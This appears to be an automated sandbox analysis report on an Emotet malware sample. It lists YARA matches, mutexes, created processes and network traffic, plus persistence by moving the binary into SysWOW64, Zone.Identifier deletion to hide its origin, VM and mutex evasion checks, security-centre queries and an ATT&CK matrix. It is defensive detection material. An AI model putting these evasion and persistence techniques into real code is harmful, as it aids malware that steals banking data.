                    Source: svchost.exe, 00000023.00000003.809763951.000001E91F748000.00000004.00000001.sdmp, svchost.exe, 00000023.00000002.1280711050.000001E91EF02000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/devicechangecredential.srf
                    Source: svchost.exe, 00000023.00000003.809763951.000001E91F748000.00000004.00000001.sdmp, svchost.exe, 00000023.00000002.1280711050.000001E91EF02000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/deviceremovecredential.srf
                    Source: svchost.exe, 00000023.00000002.1280118155.000001E91EE3D000.00000004.00000001.sdmp, svchost.exe, 00000023.00000002.1280711050.000001E91EF02000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/resetpw.srf
                    Source: svchost.exe, 00000023.00000002.1280118155.000001E91EE3D000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/retention.srf
                    Source: svchost.exe, 00000023.00000003.817201176.000001E91F73B000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com:443/RST2.srf4n#
                    Source: svchost.exe, 00000023.00000002.1280711050.000001E91EF02000.00000004.00000001.sdmpString found in binary or memory: https://login.live.ppsecure
                    Source: svchost.exe, 00000023.00000003.809763951.000001E91F748000.00000004.00000001.sdmpString found in binary or memory: https://signup.live.com/signup.aspx
                    Source: svchost.exe, 0000000E.00000002.310282027.000002C4B463D000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
                    Source: svchost.exe, 0000000E.00000002.310282027.000002C4B463D000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000002.310250602.000002C4B4613000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
                    Source: svchost.exe, 0000000E.00000003.309733634.000002C4B4640000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
                    Source: svchost.exe, 0000000E.00000003.309733634.000002C4B4640000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
                    Source: svchost.exe, 0000000E.00000003.287069493.000002C4B462F000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
                    Source: svchost.exe, 0000000E.00000003.310059566.000002C4B4638000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
                    Source: svchost.exe, 0000000E.00000003.309234233.000002C4B464F000.00000004.00000001.sdmpString found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
                    Source: svchost.exe, 00000021.00000003.560024463.000001AB9EF9D000.00000004.00000001.sdmpString found in binary or memory: https://www.hulu.com/ca-privacy-rights
                    Source: svchost.exe, 00000021.00000003.560024463.000001AB9EF9D000.00000004.00000001.sdmpString found in binary or memory: https://www.hulu.com/do-not-sell-my-info
                    Source: svchost.exe, 00000021.00000003.569537368.000001AB9EF7D000.00000004.00000001.sdmp, svchost.exe, 00000021.00000003.569479296.000001AB9EF20000.00000004.00000001.sdmpString found in binary or memory: https://www.roblox.com/develop
                    Source: svchost.exe, 00000021.00000003.569537368.000001AB9EF7D000.00000004.00000001.sdmp, svchost.exe, 00000021.00000003.569479296.000001AB9EF20000.00000004.00000001.sdmpString found in binary or memory: https://www.roblox.com/info/privacy
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                    Source: unknownHTTPS traffic detected: 167.114.153.153:443 -> 192.168.2.3:49752 version: TLS 1.2

                    E-Banking Fraud:

                    barindex
                    Yara detected EmotetShow sources
                    Source: Yara matchFile source: sample.exe.exe, type: SAMPLE
                    Source: Yara matchFile source: 00000003.00000000.202634160.0000000000C51000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.204575479.0000000000C51000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000000.204137551.0000000000C51000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.204686591.0000000000C51000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.197198753.0000000000C51000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000000.195242033.0000000000C51000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000000.196821065.0000000000C51000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.1277310547.0000000000C51000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 4.2.videowlan.exe.c50000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.sample.exe.exe.c50000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.videowlan.exe.c50000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.sample.exe.exe.c50000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.0.videowlan.exe.c50000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.sample.exe.exe.c50000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.0.sample.exe.exe.c50000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.videowlan.exe.c50000.0.unpack, type: UNPACKEDPE
                    Source: C:\Windows\System32\svchost.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CCFEED7EF3CD3BBD21329435542A98D2_9C2DDAC79C917837883918D6BB58BE90Jump to dropped file

                    System Summary:

                    barindex
                    Malicious sample detected (through community Yara rule)Show sources
                    Source: sample.exe.exe, type: SAMPLEMatched rule: Emotet Payload Author: kevoreilly
                    Source: 4.2.videowlan.exe.c50000.0.unpack, type: UNPACKEDPEMatched rule: Emotet Payload Author: kevoreilly
                    Source: 1.2.sample.exe.exe.c50000.0.unpack, type: UNPACKEDPEMatched rule: Emotet Payload Author: kevoreilly
                    Source: 4.0.videowlan.exe.c50000.0.unpack, type: UNPACKEDPEMatched rule: Emotet Payload Author: kevoreilly
                    Source: 0.0.sample.exe.exe.c50000.0.unpack, type: UNPACKEDPEMatched rule: Emotet Payload Author: kevoreilly
                    Source: 3.0.videowlan.exe.c50000.0.unpack, type: UNPACKEDPEMatched rule: Emotet Payload Author: kevoreilly
                    Source: 0.2.sample.exe.exe.c50000.0.unpack, type: UNPACKEDPEMatched rule: Emotet Payload Author: kevoreilly
                    Source: 1.0.sample.exe.exe.c50000.0.unpack, type: UNPACKEDPEMatched rule: Emotet Payload Author: kevoreilly
                    Source: 3.2.videowlan.exe.c50000.0.unpack, type: UNPACKEDPEMatched rule: Emotet Payload Author: kevoreilly
                    Source: C:\Windows\SysWOW64\videowlan.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCacheJump to behavior
                    Source: C:\Users\user\Desktop\sample.exe.exeFile deleted: C:\Windows\SysWOW64\videowlan.exe:Zone.IdentifierJump to behavior
                    Source: C:\Users\user\Desktop\sample.exe.exeCode function: 0_2_00C577F0
                    Source: C:\Users\user\Desktop\sample.exe.exeCode function: 0_2_00C56E70
                    Source: sample.exe.exe, 00000001.00000002.205266324.00000000035E0000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs sample.exe.exe
                    Source: sample.exe.exe, 00000001.00000002.204855248.00000000015A0000.00000002.00000001.sdmpBinary or memory string: originalfilename vs sample.exe.exe
                    Source: sample.exe.exe, 00000001.00000002.204855248.00000000015A0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs sample.exe.exe
                    Source: C:\Windows\System32\svchost.exeSection loaded: xboxlivetitleid.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: cdpsgshims.dll
                    Source: sample.exe.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                    Source: sample.exe.exe, type: SAMPLEMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
                    Source: 4.2.videowlan.exe.c50000.0.unpack, type: UNPACKEDPEMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
                    Source: 1.2.sample.exe.exe.c50000.0.unpack, type: UNPACKEDPEMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
                    Source: 4.0.videowlan.exe.c50000.0.unpack, type: UNPACKEDPEMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
                    Source: 0.0.sample.exe.exe.c50000.0.unpack, type: UNPACKEDPEMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
                    Source: 3.0.videowlan.exe.c50000.0.unpack, type: UNPACKEDPEMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
                    Source: 0.2.sample.exe.exe.c50000.0.unpack, type: UNPACKEDPEMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
                    Source: 1.0.sample.exe.exe.c50000.0.unpack, type: UNPACKEDPEMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
                    Source: 3.2.videowlan.exe.c50000.0.unpack, type: UNPACKEDPEMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
                    Source: classification engineClassification label: mal92.troj.evad.winEXE@23/11@0/13
                    Source: C:\Users\user\Desktop\sample.exe.exeCode function: 0_2_00C52110 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,
                    Source: C:\Windows\System32\svchost.exeFile created: C:\Users\user\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etlJump to behavior
                    Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7072:120:WilError_01
                    Source: C:\Windows\SysWOW64\videowlan.exeMutant created: \BaseNamedObjects\Global\I4D0AEB75
                    Source: C:\Windows\SysWOW64\videowlan.exeMutant created: \BaseNamedObjects\ME43671B3
                    Source: C:\Users\user\Desktop\sample.exe.exeMutant created: \Sessions\1\BaseNamedObjects\Global\I4D0AEB75
                    Source: C:\Users\user\Desktop\sample.exe.exeMutant created: \Sessions\1\BaseNamedObjects\Global\M4D0AEB75
                    Source: C:\Users\user\Desktop\sample.exe.exeMutant created: \Sessions\1\BaseNamedObjects\M93391058
                    Source: sample.exe.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\sample.exe.exeFile read: C:\Users\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\sample.exe.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: sample.exe.exeVirustotal: Detection: 78%
                    Source: sample.exe.exeReversingLabs: Detection: 96%
                    Source: unknownProcess created: C:\Users\user\Desktop\sample.exe.exe 'C:\Users\user\Desktop\sample.exe.exe'
                    Source: C:\Users\user\Desktop\sample.exe.exeProcess created: C:\Users\user\Desktop\sample.exe.exe C:\Users\user\Desktop\sample.exe.exe
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                    Source: unknownProcess created: C:\Windows\SysWOW64\videowlan.exe C:\Windows\SysWOW64\videowlan.exe
                    Source: C:\Windows\SysWOW64\videowlan.exeProcess created: C:\Windows\SysWOW64\videowlan.exe C:\Windows\SysWOW64\videowlan.exe
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k unistacksvcgroup
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
                    Source: unknownProcess created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wisvc
                    Source: C:\Users\user\Desktop\sample.exe.exeProcess created: C:\Users\user\Desktop\sample.exe.exe C:\Users\user\Desktop\sample.exe.exe
                    Source: C:\Windows\SysWOW64\videowlan.exeProcess created: C:\Windows\SysWOW64\videowlan.exe C:\Windows\SysWOW64\videowlan.exe
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
                    Source: C:\Users\user\Desktop\sample.exe.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
                    Source: sample.exe.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                    Source: C:\Users\user\Desktop\sample.exe.exeCode function: 0_2_00C51F40 VirtualAlloc,memcpy,memcpy,LoadLibraryA,GetProcAddress,VirtualFree,

                    Persistence and Installation Behavior:

                    barindex
                    Drops executables to the windows directory (C:\Windows) and starts themShow sources
                    Source: C:\Windows\SysWOW64\videowlan.exeExecutable created and started: C:\Windows\SysWOW64\videowlan.exe
                    Source: C:\Users\user\Desktop\sample.exe.exePE file moved: C:\Windows\SysWOW64\videowlan.exeJump to behavior

                    Hooking and other Techniques for Hiding and Protection:

                    barindex
                    Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                    Source: C:\Users\user\Desktop\sample.exe.exeFile opened: C:\Windows\SysWOW64\videowlan.exe:Zone.Identifier read attributes | delete
                    Source: C:\Windows\System32\svchost.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion:

                    barindex
                    Found evasive API chain (may stop execution after checking mutex)Show sources
                    Source: C:\Users\user\Desktop\sample.exe.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcess
                    Source: C:\Users\user\Desktop\sample.exe.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: C:\Users\user\Desktop\sample.exe.exeAPI coverage: 6.5 %
                    Source: C:\Windows\System32\svchost.exe TID: 5596Thread sleep time: -30000s >= -30000s
                    Source: C:\Windows\System32\svchost.exe TID: 5288Thread sleep time: -30000s >= -30000s
                    Source: C:\Windows\System32\svchost.exe TID: 3652Thread sleep time: -180000s >= -30000s
                    Source: C:\Windows\System32\svchost.exe TID: 5408Thread sleep time: -60000s >= -30000s
                    Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\sample.exe.exeFile Volume queried: C:\ FullSizeInformation
                    Source: svchost.exe, 00000002.00000002.208943013.000001B97A260000.00000002.00000001.sdmp, svchost.exe, 00000008.00000002.282707603.000001EDADD40000.00000002.00000001.sdmp, svchost.exe, 0000000B.00000002.1281880711.000001CE17590000.00000002.00000001.sdmp, svchost.exe, 00000012.00000002.306965961.0000019229260000.00000002.00000001.sdmp, svchost.exe, 00000021.00000002.589175855.000001AB9F600000.00000002.00000001.sdmp, svchost.exe, 00000023.00000002.1280844076.000001E91F460000.00000002.00000001.sdmp, svchost.exe, 00000025.00000002.958919024.00000237FDA90000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
                    Source: svchost.exe, 00000007.00000002.597752564.000001CC04460000.00000004.00000001.sdmpBinary or memory string: @Hyper-V RAW
                    Source: svchost.exe, 00000007.00000002.598124989.000001CC7EC2A000.00000004.00000001.sdmp, svchost.exe, 00000021.00000002.588532098.000001AB9E6EA000.00000004.00000001.sdmp, svchost.exe, 00000023.00000002.1280585825.000001E91EECD000.00000004.00000001.sdmp, svchost.exe, 00000025.00000003.824329732.00000237FD47A000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                    Source: svchost.exe, 0000000A.00000002.1279706539.000001447DA02000.00000004.00000001.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
                    Source: svchost.exe, 00000002.00000002.208943013.000001B97A260000.00000002.00000001.sdmp, svchost.exe, 00000008.00000002.282707603.000001EDADD40000.00000002.00000001.sdmp, svchost.exe, 0000000B.00000002.1281880711.000001CE17590000.00000002.00000001.sdmp, svchost.exe, 00000012.00000002.306965961.0000019229260000.00000002.00000001.sdmp, svchost.exe, 00000021.00000002.589175855.000001AB9F600000.00000002.00000001.sdmp, svchost.exe, 00000023.00000002.1280844076.000001E91F460000.00000002.00000001.sdmp, svchost.exe, 00000025.00000002.958919024.00000237FDA90000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
                    Source: svchost.exe, 00000002.00000002.208943013.000001B97A260000.00000002.00000001.sdmp, svchost.exe, 00000008.00000002.282707603.000001EDADD40000.00000002.00000001.sdmp, svchost.exe, 0000000B.00000002.1281880711.000001CE17590000.00000002.00000001.sdmp, svchost.exe, 00000012.00000002.306965961.0000019229260000.00000002.00000001.sdmp, svchost.exe, 00000021.00000002.589175855.000001AB9F600000.00000002.00000001.sdmp, svchost.exe, 00000023.00000002.1280844076.000001E91F460000.00000002.00000001.sdmp, svchost.exe, 00000025.00000002.958919024.00000237FDA90000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
                    Source: svchost.exe, 00000023.00000002.1280001873.000001E91EE29000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW@
                    Source: svchost.exe, 0000000A.00000002.1280064610.000001447DA40000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000002.1280219876.000001CE16A43000.00000004.00000001.sdmp, svchost.exe, 0000000D.00000002.929645959.0000028A3282A000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: svchost.exe, 00000002.00000002.208943013.000001B97A260000.00000002.00000001.sdmp, svchost.exe, 00000008.00000002.282707603.000001EDADD40000.00000002.00000001.sdmp, svchost.exe, 0000000B.00000002.1281880711.000001CE17590000.00000002.00000001.sdmp, svchost.exe, 00000012.00000002.306965961.0000019229260000.00000002.00000001.sdmp, svchost.exe, 00000021.00000002.589175855.000001AB9F600000.00000002.00000001.sdmp, svchost.exe, 00000023.00000002.1280844076.000001E91F460000.00000002.00000001.sdmp, svchost.exe, 00000025.00000002.958919024.00000237FDA90000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
                    Source: C:\Windows\SysWOW64\videowlan.exeProcess information queried: ProcessInformation
                    Source: C:\Users\user\Desktop\sample.exe.exeCode function: 0_2_00C51F40 VirtualAlloc,memcpy,memcpy,LoadLibraryA,GetProcAddress,VirtualFree,
                    Source: C:\Users\user\Desktop\sample.exe.exeCode function: 0_2_00C51BE0 mov eax, dword ptr fs:[00000030h]
                    Source: C:\Users\user\Desktop\sample.exe.exeCode function: 0_2_00C59EE0 EntryPoint,GetProcessHeap,RtlAllocateHeap,memset,GetProcessHeap,RtlFreeHeap,ExitProcess,
                    Source: svchost.exe, 0000000C.00000002.1280586176.000001F42CB90000.00000002.00000001.sdmpBinary or memory string: Program Manager
                    Source: svchost.exe, 0000000C.00000002.1280586176.000001F42CB90000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                    Source: svchost.exe, 0000000C.00000002.1280586176.000001F42CB90000.00000002.00000001.sdmpBinary or memory string: Progman
                    Source: svchost.exe, 0000000C.00000002.1280586176.000001F42CB90000.00000002.00000001.sdmpBinary or memory string: Progmanlock
                    Source: C:\Users\user\Desktop\sample.exe.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\videowlan.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                    Source: C:\Users\user\Desktop\sample.exe.exeCode function: 0_2_00C58D50 RtlGetVersion,GetNativeSystemInfo,
                    Source: C:\Windows\SysWOW64\videowlan.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                    Lowering of HIPS / PFW / Operating System Security Settings:

                    barindex
                    Changes security center settings (notifications, updates, antivirus, firewall)Show sources
                    Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cvalJump to behavior
                    Source: svchost.exe, 00000025.00000003.826730478.00000237FDD2E000.00000004.00000001.sdmpBinary or memory string: \BullGuard Ltd\BullGuard\BullGuard.exe
                    Source: svchost.exe, 00000011.00000002.1279270495.000001FD7443D000.00000004.00000001.sdmpBinary or memory string: (@V%ProgramFiles%\Windows Defender\MsMpeng.exe
                    Source: svchost.exe, 00000011.00000002.1279398715.000001FD74502000.00000004.00000001.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                    Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA &apos;AntiVirusProduct&apos; OR TargetInstance ISA &apos;FirewallProduct&apos; OR TargetInstance ISA &apos;AntiSpywareProduct&apos;
                    Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
                    Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
                    Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct

                    Stealing of Sensitive Information:

                    barindex
                    Yara detected EmotetShow sources
                    Source: Yara matchFile source: sample.exe.exe, type: SAMPLE
                    Source: Yara matchFile source: 00000003.00000000.202634160.0000000000C51000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.204575479.0000000000C51000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000000.204137551.0000000000C51000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.204686591.0000000000C51000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.197198753.0000000000C51000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000000.195242033.0000000000C51000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000000.196821065.0000000000C51000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.1277310547.0000000000C51000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 4.2.videowlan.exe.c50000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.sample.exe.exe.c50000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.videowlan.exe.c50000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.sample.exe.exe.c50000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.0.videowlan.exe.c50000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.sample.exe.exe.c50000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.0.sample.exe.exe.c50000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.videowlan.exe.c50000.0.unpack, type: UNPACKEDPE

                    Mitre Att&ck Matrix

                    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                    Valid AccountsWindows Management Instrumentation1DLL Side-Loading1Process Injection2Masquerading121OS Credential DumpingQuery Registry1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                    Default AccountsNative API11Boot or Logon Initialization ScriptsDLL Side-Loading1Disable or Modify Tools1LSASS MemorySecurity Software Discovery51Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
